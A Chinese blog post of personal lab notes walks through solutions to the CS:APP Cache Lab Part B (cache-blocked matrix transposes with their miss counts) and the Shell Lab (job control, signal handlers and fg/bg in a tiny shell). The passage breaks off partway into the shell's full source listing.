此时此刻，相较于写单纯地写试验记录，我更想记录下做Part B这部分的心路历程。可以说，Part B部分是目前做过的所有实验里最麻烦、最困难、最坑的，我必须得承认在过去的几天我被折磨得很难受，甚至在昨天回学校的飞机上我也一直在想解题思路，看了很多题解加上心无旁骛的弄了很久才终于将终于得出满分答案。但直到现在做出来我还是很沮丧的，因为CacheLab两个部分我都没能独立完成。Part A按自己方法做出来但是就是无法正常运行，Part B阅读完网络旁注的提示也没有丝毫头绪，于是看别人题解，看一眼，感觉懂了，有思路了，又自己做，又无从下手，又看，只看个大概，又觉得自己懂了，又自己做，又卡住......这种轮回在过去的三天至少发生了十多次。很多时候看了题解有了思路，反思自己，其实再多想想也未必想不到，但就是想要依赖现成的、“完全正确的”答案，哪怕最后做出来了，也不是靠自己的思考与实践弄出来的，总是心情低落。又鉴于此部分坑多题难，于是想要好好写一写题解，用自己的话、自己的理解把一切东西都说清楚，才算真正做懂了这个实验

首先想要提醒的是这个实验的一个究极大坑：当完成trans.c程序后，按照实验文档说明检验自己的程序

unix> make clean
unix> make
unix> ./test-trans -M 64 -N 64

发现这个test-trans程序运行极慢，需要几十秒甚至几分钟才能出结果，而且最后弹出一个超时错误

Step 1: Validating and generating memory traces
Error: Program timed out.

呵呵，一开始我也没觉得有啥不对劲，单纯以为这个程序就是跑得很慢，或者显示超时可能是我的代码逻辑出错了。但是哪怕我使用别人题解里正确的、通过测试的代码，在我的机器上仍是超时，而在别人的机器上则能轻松通过。上网查了一下这个问题，相关回答很少，但有一个管用的解决方法：将解压出来的文件夹放到linux系统的桌面，即可正常运行。具体是什么原因导致的这个大坑我也没弄清楚，但此方法是可行的，至此我才知此前我检测答案时动辄三五分钟的运行时间，还只能得到一个Program timed out错误是有多离谱

接下来分析一下具体实验内容，这里结合我几次想当然走而犯的错，提醒一下，必须要仔细审题，首先，这个部分的cache采用的是直接映射替换策略（我当初想当然以为是全相联，说多了都是泪），cache一共32组，一组一行，而一行又可存储32个字节。因为本题是求int型矩阵的转置，而一个int是四字节大小，因此cache中一行最多能存八个矩阵元素，整个cache最多能存储256个矩阵元素

本题只有三个测试矩阵

32 x 32(M = 32, N = 32)
64 x 64(M = 64, N = 64)
61 x 67(M = 61, N = 67)

且A矩阵是N行M列，B矩阵是M行N列，先讨论32 x 32大小的矩阵

在继续向下前确保你已阅读这篇文章并理解其原理

32 x 32

要完成对一个矩阵进行转置，这是实验自带的一个解答

void trans(int M, int N, int A[N][M], int B[M][N])
{
    int i, j, tmp;

    for (i = 0; i < N; i++) {
        for (j = 0; j < M; j++) {
            tmp = A[i][j];
            B[j][i] = tmp;
        }
    }    

}

程序正确性一目了然，但缺失率呢？

Function 0 (1 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Simple row-wise scan transpose): hits:870, misses:1183, evictions:1151

此题若要拿到满分，需要将misses降到300以下，显然此方法缺失率过高。究其原因，上述代码并未很好利用空间局限性性质，试想第一次访问A[0][0]元素时，冷不命中，于是将A[0][0]至A[0][7]元素加载于cache同一行中，对于A数组放在同一个set中的八个元素，八次访问中，缺失一次，命中七次，命中率尚可。但若考虑B数组，B数组按列访问，B[0][0]与B[1][0]之间隔了31个元素，若B[0][0]映射于set 0中，冷不命中，则B[1][0]映射于set 4中，冷不命中，B[2][0]映射于set 7中，冷不命中，......，B[7][0]映射于set 28中，而此时若访问B[8][0]，由于只有32个组，因此B[8][0]又将映射到set 0中，将原本B[0][0]等元素覆盖掉，访问B[9][0]也会将B[1][0]所在组的元素全覆盖掉，每一次访问都不命中。因此，32 x 32型矩阵，B数组最多连续八列于cache中。即如果我们将B数组的连续八列放于cache中，刚好不会互相覆盖，然后将这八列所在的八个set均填满，就能像访问A数组一样做到连续八个元素的访问中七次命中，一次缺失，代码如下

void trans0(int M, int N, int A[N][M], int B[M][N])
{
    int i, j, ii, a0, a1, a2, a3, a4, a5, a6, a7;
    for (i = 0; i < N; i += 8) {
        for (j = 0; j < M; j += 8) {
            for (ii = i; ii < i + 8; ii++) {
                a0 = A[ii][j + 0];
                a1 = A[ii][j + 1];
                a2 = A[ii][j + 2];
                a3 = A[ii][j + 3];
                a4 = A[ii][j + 4];
                a5 = A[ii][j + 5];
                a6 = A[ii][j + 6];
                a7 = A[ii][j + 7];
                B[j + 0][ii] = a0;
                B[j + 1][ii] = a1;
                B[j + 2][ii] = a2;
                B[j + 3][ii] = a3;
                B[j + 4][ii] = a4;
                B[j + 5][ii] = a5;
                B[j + 6][ii] = a6;
                B[j + 7][ii] = a7;
            }
        }
    }
}

建议拿上纸和笔演算一下。上述代码将矩阵分成8 x 8的块，对每块分别进行转置，实际上利用的就是网络旁注文章中介绍的思想。该函数测试结果如下

Function 1 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 1 (Improved version 1): hits:1766, misses:287, evictions:255

已达到本题满分要求

按上述思路，理想状态下缺失数应为(8 + 8) * 16 = 256次，8 + 8代表一个8 x 8的小块里A矩阵八次缺失加上B矩阵八次缺失，16为块数目。而我们缺失次数为287，多了31次，深入分析发现转置位于矩阵对角线上的元素会带来额外一次缺失，例如，初始访问A[0][0]，冷不命中，将A[0][0]至A[0][7]加载至set 0中，接着将B[0][0]至B[7][0]加载于cache中。理想情况下，B数组加载至cache中的set应该一直在缓存里，不被换出，直至全部填满。但考虑当访问A数组至A[1][0]元素开头的八个元素时，这些元素将会映射到B[1][0]所处的set中，将其覆盖，当后续再度访问B[1][0]等元素时，将发生缺失。这是我们不愿意看到的，考虑是否有方法可以避免这样的“悲剧”发生呢？

梳理一下问题，即若我们先将B数组的各列加载于cache中，在访问A数组过程中将会把某些B数组已加载的值覆盖掉。要避免覆盖的发生，只有想办法在访问A数组对应列之前，不访问后续B数组的列。例如，如果我们先将B[5][0]所在行加载于cache，当A数组访问至A[5][0]时，将其覆盖，后续再访问B[5][0]所在set内的元素将发生一次缺失。而A[5][0]至A[5][7]只会加载入缓存一次，待这次加载后再将B[5][0]至B[5][7]加载入缓存，不再可能发生覆盖，问题得到解决。

因此，我们得将A数组获得的、属于后续B数组列的值暂存在某个地方，待时机成熟后再让暂存的值回归正确位置，具体做法请见代码

for (i = 0; i < N; i += 8) {
    for (j = 0; j < M; j += 8) {
        if (i == j) { // i, j值相等，对角线位于此块内
            a0 = A[i + 0][j + 0], a1 = A[i + 0][j + 1], a2 = A[i + 0][j + 2], a3 = A[i + 0][j + 3];
            a4 = A[i + 0][j + 4], a5 = A[i + 0][j + 5], a6 = A[i + 0][j + 6], a7 = A[i + 0][j + 7];
            B[i + 0][j + 0] = a0, B[i + 0][j + 1] = a1, B[i + 0][j + 2] = a2, B[i + 0][j + 3] = a3;
            B[i + 0][j + 4] = a4, B[i + 0][j + 5] = a5, B[i + 0][j + 6] = a6, B[i + 0][j + 7] = a7;

            a0 = A[i + 1][j + 0], a1 = A[i + 1][j + 1], a2 = A[i + 1][j + 2], a3 = A[i + 1][j + 3];
            a4 = A[i + 1][j + 4], a5 = A[i + 1][j + 5], a6 = A[i + 1][j + 6], a7 = A[i + 1][j + 7];
            B[i + 1][j + 0] = B[i + 0][j + 1], B[i + 0][j + 1] = a0;
            B[i + 1][j + 1] = a1, B[i + 1][j + 2] = a2, B[i + 1][j + 3] = a3;
            B[i + 1][j + 4] = a4, B[i + 1][j + 5] = a5, B[i + 1][j + 6] = a6, B[i + 1][j + 7] = a7;

            a0 = A[i + 2][j + 0], a1 = A[i + 2][j + 1], a2 = A[i + 2][j + 2], a3 = A[i + 2][j + 3];
            a4 = A[i + 2][j + 4], a5 = A[i + 2][j + 5], a6 = A[i + 2][j + 6], a7 = A[i + 2][j + 7];
            B[i + 2][j + 0] = B[i + 0][j + 2], B[i + 0][j + 2] = a0;
            B[i + 2][j + 1] = B[i + 1][j + 2], B[i + 1][j + 2] = a1;
            B[i + 2][j + 2] = a2, B[i + 2][j + 3] = a3;
            B[i + 2][j + 4] = a4, B[i + 2][j + 5] = a5, B[i + 2][j + 6] = a6, B[i + 2][j + 7] = a7;

            a0 = A[i + 3][j + 0], a1 = A[i + 3][j + 1], a2 = A[i + 3][j + 2], a3 = A[i + 3][j + 3];
            a4 = A[i + 3][j + 4], a5 = A[i + 3][j + 5], a6 = A[i + 3][j + 6], a7 = A[i + 3][j + 7];
            B[i + 3][j + 0] = B[i + 0][j + 3], B[i + 0][j + 3] = a0;
            B[i + 3][j + 1] = B[i + 1][j + 3], B[i + 1][j + 3] = a1;
            B[i + 3][j + 2] = B[i + 2][j + 3], B[i + 2][j + 3] = a2;
            B[i + 3][j + 3] = a3;
            B[i + 3][j + 4] = a4, B[i + 3][j + 5] = a5, B[i + 3][j + 6] = a6, B[i + 3][j + 7] = a7;

            a0 = A[i + 4][j + 0], a1 = A[i + 4][j + 1], a2 = A[i + 4][j + 2], a3 = A[i + 4][j + 3];
            a4 = A[i + 4][j + 4], a5 = A[i + 4][j + 5], a6 = A[i + 4][j + 6], a7 = A[i + 4][j + 7];
            B[i + 4][j + 0] = B[i + 0][j + 4], B[i + 0][j + 4] = a0;
            B[i + 4][j + 1] = B[i + 1][j + 4], B[i + 1][j + 4] = a1;
            B[i + 4][j + 2] = B[i + 2][j + 4], B[i + 2][j + 4] = a2;
            B[i + 4][j + 3] = B[i + 3][j + 4], B[i + 3][j + 4] = a3;
            B[i + 4][j + 4] = a4, B[i + 4][j + 5] = a5, B[i + 4][j + 6] = a6, B[i + 4][j + 7] = a7;

            a0 = A[i + 5][j + 0], a1 = A[i + 5][j + 1], a2 = A[i + 5][j + 2], a3 = A[i + 5][j + 3];
            a4 = A[i + 5][j + 4], a5 = A[i + 5][j + 5], a6 = A[i + 5][j + 6], a7 = A[i + 5][j + 7];
            B[i + 5][j + 0] = B[i + 0][j + 5], B[i + 0][j + 5] = a0;
            B[i + 5][j + 1] = B[i + 1][j + 5], B[i + 1][j + 5] = a1;
            B[i + 5][j + 2] = B[i + 2][j + 5], B[i + 2][j + 5] = a2;
            B[i + 5][j + 3] = B[i + 3][j + 5], B[i + 3][j + 5] = a3;
            B[i + 5][j + 4] = B[i + 4][j + 5], B[i + 4][j + 5] = a4;
            B[i + 5][j + 5] = a5, B[i + 5][j + 6] = a6, B[i + 5][j + 7] = a7;

            a0 = A[i + 6][j + 0], a1 = A[i + 6][j + 1], a2 = A[i + 6][j + 2], a3 = A[i + 6][j + 3];
            a4 = A[i + 6][j + 4], a5 = A[i + 6][j + 5], a6 = A[i + 6][j + 6], a7 = A[i + 6][j + 7];
            B[i + 6][j + 0] = B[i + 0][j + 6], B[i + 0][j + 6] = a0;
            B[i + 6][j + 1] = B[i + 1][j + 6], B[i + 1][j + 6] = a1;
            B[i + 6][j + 2] = B[i + 2][j + 6], B[i + 2][j + 6] = a2;
            B[i + 6][j + 3] = B[i + 3][j + 6], B[i + 3][j + 6] = a3;
            B[i + 6][j + 4] = B[i + 4][j + 6], B[i + 4][j + 6] = a4;
            B[i + 6][j + 5] = B[i + 5][j + 6], B[i + 5][j + 6] = a5;
            B[i + 6][j + 6] = a6, B[i + 6][j + 7] = a7;

            a0 = A[i + 7][j + 0], a1 = A[i + 7][j + 1], a2 = A[i + 7][j + 2], a3 = A[i + 7][j + 3];
            a4 = A[i + 7][j + 4], a5 = A[i + 7][j + 5], a6 = A[i + 7][j + 6], a7 = A[i + 7][j + 7];
            B[i + 7][j + 0] = B[i + 0][j + 7], B[i + 0][j + 7] = a0;
            B[i + 7][j + 1] = B[i + 1][j + 7], B[i + 1][j + 7] = a1;
            B[i + 7][j + 2] = B[i + 2][j + 7], B[i + 2][j + 7] = a2;
            B[i + 7][j + 3] = B[i + 3][j + 7], B[i + 3][j + 7] = a3;
            B[i + 7][j + 4] = B[i + 4][j + 7], B[i + 4][j + 7] = a4;
            B[i + 7][j + 5] = B[i + 5][j + 7], B[i + 5][j + 7] = a5;
            B[i + 7][j + 6] = B[i + 6][j + 7], B[i + 6][j + 7] = a6;
            B[i + 7][j + 7] = a7;
        }
        else { // 对角线不在块中，这部分和前面trans0()函数中的一样
            for (ii = i; ii < i + 8; ii++) {
                a0 = A[ii][j + 0];
                a1 = A[ii][j + 1];
                a2 = A[ii][j + 2];
                a3 = A[ii][j + 3];
                a4 = A[ii][j + 4];
                a5 = A[ii][j + 5];
                a6 = A[ii][j + 6];
                a7 = A[ii][j + 7];
                B[j + 0][ii] = a0;
                B[j + 1][ii] = a1;
                B[j + 2][ii] = a2;
                B[j + 3][ii] = a3;
                B[j + 4][ii] = a4;
                B[j + 5][ii] = a5;
                B[j + 6][ii] = a6;
                B[j + 7][ii] = a7;
            }
        }
    }
}

代码看起来有点吓人，因为我不喜欢用别人有水印的图，自己又懒得作图，靠打字有点难说，推荐不理解的同学拿上纸和笔跟着推导一下。不需要完全推到到最后，写个两三行应该就能领会其意。实在不明白请参考参考1。

测试一下缺失数是否达到最低的256次

Function 0 (3 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:2018, misses:259, evictions:227

实际缺失259次，比理论预期多了三次。根据参考1，这是由于系统的额外三次开销，并非程序问题，即我们的思路于代码是对的，只需缺失256次即可完成矩阵转置

64 x 64

当矩阵规模来到64 x 64后，若继续将其划分为若干8 x 8有些不太合适。若B[0][0]加载于set 0中，则B[1][0]加载于set 8中，

B[2][0]加载于set 16中，B[3][0]加载于set 24中，缓存中最多只能同时放下B数组连续的4列，于是考虑将整个矩阵全划分为4 x 4大小的分块，得函数如下

char trans_desc1[] = "4 x 4";
void trans1(int M, int N, int A[N][M], int B[M][N])
{
    int i, j, ii, a0, a1, a2, a3;
    for (i = 0; i < N; i += 4) {
        for (j = 0; j < M; j += 4) {
            for (ii = i; ii < i + 4; ii++) {
                a0 = A[ii][j + 0];
                a1 = A[ii][j + 1];
                a2 = A[ii][j + 2];
                a3 = A[ii][j + 3];
                B[j + 0][ii] = a0;
                B[j + 1][ii] = a1;
                B[j + 2][ii] = a2;
                B[j + 3][ii] = a3;
            }
        }
    }
}

测试结果为

Function 0 (1 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (4 x 4): hits:6498, misses:1699, evictions:1667

1699次缺失，不太理想。按这种分块，当访问如A[0][0]元素时，将A[0][0]至A[0][７]八个元素都加载入缓存中，而我们只使用了A[0][0]到A[0][３]四个元素，后四个元素被遗弃，后续需要使用这些元素时又得将这八个元素再次加载入内存，由此造成了不必要的缺失。同之前的思路，既然一次加载八个元素入缓存，后四个暂时用不上，考虑将其存储于某处，条件满足时再将其从暂存处取出使用，而不必再次将这些元素加载到缓存中，从而减少缺失次数。具体地，我们仍将64 x 64分为16个8 x 8大小的块，再将每个8 x 8的块分为4个4 x 4的块，分别取左上、右上、左下、右下四小块为一号块、二号块、三号块与四号块，如下图

{% asset_img cachelab_1.jpg %}

我们先取A数组前四行，转置后应放在B数组的一号块与三号块处，但鉴于两块互相覆盖，暂时将三号块的内容存于二号块中，代码如下

for (ii = i; ii < i + 4; ii++) {
    a0 = A[ii][j + 0], a1 = A[ii][j + 1], a2 = A[ii][j + 2], a3 = A[ii][j + 3];
    a4 = A[ii][j + 4], a5 = A[ii][j + 5], a6 = A[ii][j + 6], a7 = A[ii][j + 7];
    B[j + 0][ii + 0] = a0, B[j + 1][ii + 0] = a1, B[j + 2][ii + 0] = a2, B[j + 3][ii + 0] = a3;
    B[j + 0][ii + 4] = a4, B[j + 1][ii + 4] = a5, B[j + 2][ii + 4] = a6, B[j + 3][ii + 4] = a7;
}

接下来，我们竖着放。举例：A[4][0], A[5][0], A[6][0], A[7][0]转置后应放置于B[0][4], B[0][5], B[0][6], B[0][7]中，按此方法将A数组第三块中的16个元素一列一列的放于对应的B数组第二块中。但原本B数组第二块中暂存着属于B数组第三块中的内容，因此顺序应是先将A数组对应列元素取出暂存，将B数组对应行元素也取出暂存，然后将A数组暂存值放入B数组第二块对应位置，将B数组取出暂存的值放入B数组第三块正确位置，代码如下

for (jj = j; jj < j + 4; jj++) {
    /* 暂存A数组元素 */
    a0 = A[i + 4][jj], a1 = A[i + 5][jj], a2 = A[i + 6][jj], a3 = A[i + 7][jj];
    /* 暂存B数组第二块原本暂存的元素 */
    a4 = B[jj][i + 4], a5 = B[jj][i + 5], a6 = B[jj][i + 6], a7 = B[jj][i + 7];
    /* A数组第三块元素放入B数组第二块中 */
    B[jj][i + 4] = a0, B[jj][i + 5] = a1, B[jj][i + 6] = a2, B[jj][i + 7] = a3;
    /* 原本应该放于B数组第三块的元素 */
    B[jj + 4][i + 0] = a4, B[jj + 4][i + 1] = a5, B[jj + 4][i + 2] = a6, B[jj + 4][i + 3] = a7;
}

这样，A、B数组均只剩下第四块待完成，代码如下

for (ii = i + 4; ii < i + 8; ii++) {
    a0 = A[ii][j + 4], a1 = A[ii][j + 5], a2 = A[ii][j + 6], a3 = A[ii][j + 7];
    B[j + 4][ii] = a0, B[j + 5][ii] = a1, B[j + 6][ii] = a2, B[j + 7][ii] = a3;
}

完整代码

if (M == 64) {
    for (i = 0; i < N; i += 8) {
        for (j = 0; j < M; j += 8) {
            for (ii = i; ii < i + 4; ii++) {
                a0 = A[ii][j + 0], a1 = A[ii][j + 1], a2 = A[ii][j + 2], a3 = A[ii][j + 3];
                a4 = A[ii][j + 4], a5 = A[ii][j + 5], a6 = A[ii][j + 6], a7 = A[ii][j + 7];
                B[j + 0][ii + 0] = a0, B[j + 1][ii + 0] = a1, B[j + 2][ii + 0] = a2, B[j + 3][ii + 0] = a3;
                B[j + 0][ii + 4] = a4, B[j + 1][ii + 4] = a5, B[j + 2][ii + 4] = a6, B[j + 3][ii + 4] = a7;
            }
            for (jj = j; jj < j + 4; jj++) {
                a0 = A[i + 4][jj], a1 = A[i + 5][jj], a2 = A[i + 6][jj], a3 = A[i + 7][jj];
                a4 = B[jj][i + 4], a5 = B[jj][i + 5], a6 = B[jj][i + 6], a7 = B[jj][i + 7];
                B[jj][i + 4] = a0, B[jj][i + 5] = a1, B[jj][i + 6] = a2, B[jj][i + 7] = a3;
                B[jj + 4][i + 0] = a4, B[jj + 4][i + 1] = a5, B[jj + 4][i + 2] = a6, B[jj + 4][i + 3] = a7;
            }
            for (ii = i + 4; ii < i + 8; ii++) {
                a0 = A[ii][j + 4], a1 = A[ii][j + 5], a2 = A[ii][j + 6], a3 = A[ii][j + 7];
                B[j + 4][ii] = a0, B[j + 5][ii] = a1, B[j + 6][ii] = a2, B[j + 7][ii] = a3;
            } 
        }
    }
}

测试结果

Function 0 (1 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:9066, misses:1179, evictions:1147

已达到满分要求

这里说明下为啥按上面方案这么做，其实我也是参考了别人的思路。我自己做想到了在转置第一块时将原本属于B数组第三块的内容暂存于B数组第二块，也就是上述的第一步，以此避免一些不必要的缺失。但后续我当时考虑的是B数组接下来的四行也这么做，这样的话B数组第一块和第四块的元素都是正确的，第二块和第三块的元素刚好反了，那么就再交换一轮就好。但是若是按我的思路，交换第二块和第三块将会比上面这种方法多很多缺失，别人这个确实比我的更加精妙

61 x 67

这个“不规则的”初看很难，实际上算是最简单的，直接分块即可

for (i = 0; i < M; i += 16) {
    for (j = 0; j < N; j += 16) {
        for (jj = j; jj < j + 16 && jj < N; jj++) {
            for (ii = i; ii < i + 16 && i < M; ii++) {
                B[ii][jj] = A[jj][ii];
            }
        }
    }
}

注意，同等大小分块，采取B数组逐行扫描比采取A数组逐行扫描缺失数更低，测试结果

Function 0 (1 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:6673, misses:1908, evictions:1876

你问我为什么知道分16 x16大小？把所有可能都试一下就知道了，我测试了4 x 4大小到20 x 20大小的分块可能，我的机器上测出来是16 x 16分块的缺失数目最小，但看别人测出来是17 x 17最小，没深入钻这个，不想管了

最终结果

fez@papyruszzz:~/Desktop/CacheLab$ ./driver.py 
Part A: Testing cache simulator
Running ./test-csim
                        Your simulator     Reference simulator
Points (s,E,b)    Hits  Misses  Evicts    Hits  Misses  Evicts
     3 (1,1,1)       9       8       6       9       8       6  traces/yi2.trace
     3 (4,2,4)       4       5       2       4       5       2  traces/yi.trace
     3 (2,1,4)       2       3       1       2       3       1  traces/dave.trace
     3 (2,1,3)     167      71      67     167      71      67  traces/trans.trace
     3 (2,2,3)     201      37      29     201      37      29  traces/trans.trace
     3 (2,4,3)     212      26      10     212      26      10  traces/trans.trace
     3 (5,1,5)     231       7       0     231       7       0  traces/trans.trace
     6 (5,1,5)  265189   21775   21743  265189   21775   21743  traces/long.trace
    27


Part B: Testing transpose function
Running ./test-trans -M 32 -N 32
Running ./test-trans -M 64 -N 64
Running ./test-trans -M 61 -N 67

Cache Lab summary:
                        Points   Max pts      Misses
Csim correctness          27.0        27
Trans perf 32x32           8.0         8         259
Trans perf 64x64           8.0         8        1179
Trans perf 61x67          10.0        10        1908
          Total points    53.0        53

小结

今天(2021/8/28)起床没多久就把Part B做完了，然后就一直在写题解，现在已经是下午四点半了。手腕写的很疼，小结部分不想写太多。回看整个CacheLab实验经历，犯了太多错误。有轻视实验难度，阅读材料不认真看错题干的，有凭感觉想当然做的，也有意志不坚定自己没思考多久就求助题解的。总的来说，除了之前说的过的，仍有遗憾——我感觉我的题解没写的特别清晰，主要配图也几乎没有，可能有点难理解。但值得欣慰的是没有匆匆就略过这个实验，知道自己是看了很多别人的题解才做出来的，就更要花时间把东西理解透彻，确保自己真的懂了。今天花了一天时间写题解，从最初的状态顺着思路完整梳理了一遍过程，对整个缓存的命中、缺失与替换有了更深的理解，确实学到了不少东西。戒骄戒躁，脚踏实地。

PerformanceLab

Cache Lab
At CMU we use this lab in place of the Performance Lab.

由官网描述，既然CMU都用CacheLab代替PerformanceLab，再加上自己时间有限，做过CacheLab就不做这个实验了

完结撒花！

ShellLab

这个实验乍一看不难，实际上手也不很难，但要想完全解决仍不容易。其实坑还是不少，例如一上来就是残缺的程序，从哪个函数开始补全？是一个函数全补完了再弄别的函数还是齐头并进？从哪些功能的实现开始？做完回顾，觉得这个实验的确非常精妙，难度适中，初上手时看着要实现这么多功能，有这么多注意事项要考虑，脑子一下子转不过来。但无论某个功能实现起来有多难，用第八章学到的知识一定能实现，一点没有超纲。越做到后边越感受到实验作者的功力之深厚

首先，实验手册里那句Read every word of Chapter 8(Exceptional Control Flow) in your textbook.非常重要，所有的谜题都能在这一章找到答案。搭建shell时，同样按照实验手册里的建议，根据tshref例程运行从trace0到trace16的结果，一步一步来构建自己的shell

trace01

最开始实验时，我选择先从eval()函数开始入手，模仿书上示例里的eval()搭建自己的eval()。先将书上这个的函数代码原封不动复制过来，测试trace01文件，但由于本身这个测试没有任何输出，我不很确定这个测试着重点在哪，反正自己的程序也是没有任何返回，和例程运行结果一样就行

trace02

坦白讲，trace02的作用我没太弄清，看似是实现builtin()函数，但结合trace03看，两个文件似乎让我做同一件事，不太明白

trace03

按注释，此函数测试shell内置的quit()函数，因此应该修改builtin()函数实现对应功能，代码如下

int builtin_cmd(char **argv) 
{
    if (!strcmp(argv[0], "quit"))
        exit(0);
    if (!strcmp(argv[0], "jobs"))
        return 1;
    if (!strcmp(argv[0], "fg"))
        return 1;
    if (!strcmp(argv[0], "bg"))
        return 1;
    return 0;     /* not a builtin command */
}

我的builtin_cmd()函数逻辑为，只做判断，不实际运行（除quit()函数）

trace04

由例程的运行结果分析知，需要实现后台作业，并将其信息显示在屏幕上，因此修改eval()函数实现如下

void eval(char *cmdline) 
{   
    char* argv[MAXARGS];            /* Argument list execve() */
    char buf[MAXLINE];              /* Holds modified command line */
    int bg, state;                  /* Should the job run in bg or fg? */
    pid_t pid;                      /* Process id */
    sigset_t mask_one, mask_all, prev_one;

    Sigemptyset(&mask_one);
    Sigaddset(&mask_one, SIGCHLD);
    Sigfillset(&mask_all);

    strcpy(buf, cmdline);
    bg = parseline(buf, argv);
    if (argv[0] == NULL)            /* Ignore empty lines */
        return;     

    if (!builtin_cmd(argv)) {
        Sigprocmask(SIG_SETMASK, &mask_one, &prev_one);

        if ((pid = Fork()) == 0) {  /* Child runs user job */
            Sigprocmask(SIG_SETMASK, &prev_one, NULL);
            setpgid(0, 0);
            if (execve(argv[0], argv, environ) < 0) {
                printf("%s: Command not found.\n", argv[0]);
                exit(0);
            }
        }

        state = bg ? BG : FG;
           
        /* Block all signals.This process cannot be interrupted */
        Sigprocmask(SIG_SETMASK, &mask_all, NULL);
        addjob(jobs, pid, state, cmdline);
        Sigprocmask(SIG_SETMASK, &prev_one, NULL);

        /* Parent waits for foreground job to terminate */
        if (bg) {
            printf("[%d] (%d) %s", pid2jid(pid), pid, cmdline);
        }
        else waitfg(pid);     
    }
    else {      /* builtin command */
        if (!strcmp(argv[0], "jobs"))
            listjobs(jobs);
        else do_bgfg(argv);
    }

    return;
}

这里我将最终版完整的eval()函数直接放出来，因为如果每个trace文件都按最初实现的过程一步步重新模拟工作量太大，个人觉得这个实验难度也不很大，加上代码均配有注释，阅读理解起来难度不会很大，后面trace涉及改进此函数的都不再逐步演示，直接参考本代码即可。注意eval()几个难点，考虑竞争，addjob()函数的执行是绝不可打断的，所以执行前屏蔽所有信号。且addjob()须在处理子进程返回SIGCHLD信号前将子进程添加至jobs列表中，因此在判断输入的命令不是shell内置命令之后，立刻屏蔽SIGCHLD信号，但是子进程在调用execve()函数前又需要取消该信号的屏蔽。setpgid()功能请见实验手册

trace05

这个测试的重点在于jobs命令的实现，该命令要实现的功能是打印所有后台程序。在本实验自带的辅助函数里有一个listjobs()函数，其功能为打印所有进程，无论前台后台，将其稍作修改，即可满足jobs指令功能

void listjobs(struct job_t *jobs) 
{
    int i;
    
    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0 && jobs[i].state != FG) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG: 
                printf("Running ");
                break;
            case ST: 
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ", 
                   i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}

trace06

要求实现捕捉SIGINT信号，终止前台程序

void sigint_handler(int sig) 
{
    int olderrno = errno;

    pid_t pid = fgpid(jobs);
    if (pid != 0)
        kill(-pid, SIGINT);
    else printf("No foreground job is running!\n");

    errno = olderrno;
}

注意kill()函数应向前台进程所在的整个进程组发送信号，因此是负的pid值

trace07

由eval()函数里setpgid(0, 0)已实现

trace08

要求实现捕捉SIGTSTP信号，停止前台程序

void sigtstp_handler(int sig) 
{
   int olderrno = errno;

   pid_t pid = fgpid(jobs);
   if (pid != 0)
       kill(-pid, SIGTSTP);
   else printf("No foreground job is running!\n");

   errno = olderrno;
}

trace09 & trace10

都是关于do_bgfg()函数的实现

void do_bgfg(char **argv) 
{
    int jid = 0, pid = 0, isFG = 0;
    char* cp;
    struct job_t* job = NULL;

    /* Should the job run in bg or fg? */
    isFG = (!strcmp(argv[0], "fg")) ? 1 : 0;

    if (argv[1] == NULL) {  /* Parameter missing */
        if (isFG)
            printf("fg command requires PID or %%jobid argument\n");
        else
            printf("bg command requires PID or %%jobid argument\n");
        return;
    }

    cp = argv[1];
    if (cp[0] == '%') { /* The number stands for jid */
        cp++;
        /* Check whether the ID is valid */
        for (char* tmp = cp; *tmp != '\0'; tmp++) {
            if (*tmp < '0' || *tmp > '9') {
                if (isFG)
                    printf("fg: argument must be a PID or %%jobid\n");
                else
                    printf("bg: argument must be a PID or %%jobid\n");
                return;
            }
        }
        jid = atoi(cp);
        job = getjobjid(jobs, jid);
    }
    else {              /* The number stands for pid */
        /* Check whether the ID is valid */
        for (char* tmp = cp; *tmp != '\0'; tmp++) {
            if (*tmp < '0' || *tmp > '9') {
                if (isFG)
                    printf("fg: argument must be a PID or %%jobid\n");
                else
                    printf("bg: argument must be a PID or %%jobid\n");
                return;
            }
        }
        pid = atoi(cp);
        job = getjobpid(jobs, pid);
    }

    if (job == NULL) {
        if (argv[1][0] == '%')
            printf("%%%d: No such job\n", jid);
        else
            printf("(%d): No such process\n", pid);
        return;
    }

    /* Since we want to put the process in the 
    foreground or background, restart it if it was stopped */
    kill(-job->pid, SIGCONT);

    if (isFG) {
        job->state = FG;
        waitfg(job->pid);
    }
    else {
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
        job->state = BG;
    }
    
}

trace11 & trace 12

发送信号给整个进程组成员，在trace06, trace08已实现

trace13 & trace 14 & trace15 & trace16

没啥新东西

完整代码

/* 
 * tsh - A tiny shell program with job control
 * 
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

/* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
#define MAXJID    1<<16   /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/* 
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

/* Global variables */
extern char **environ;      /* defined in libc */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output */
int nextjid = 1;            /* next job ID to allocate */
char sbuf[MAXLINE];         /* for composing sprintf messages */

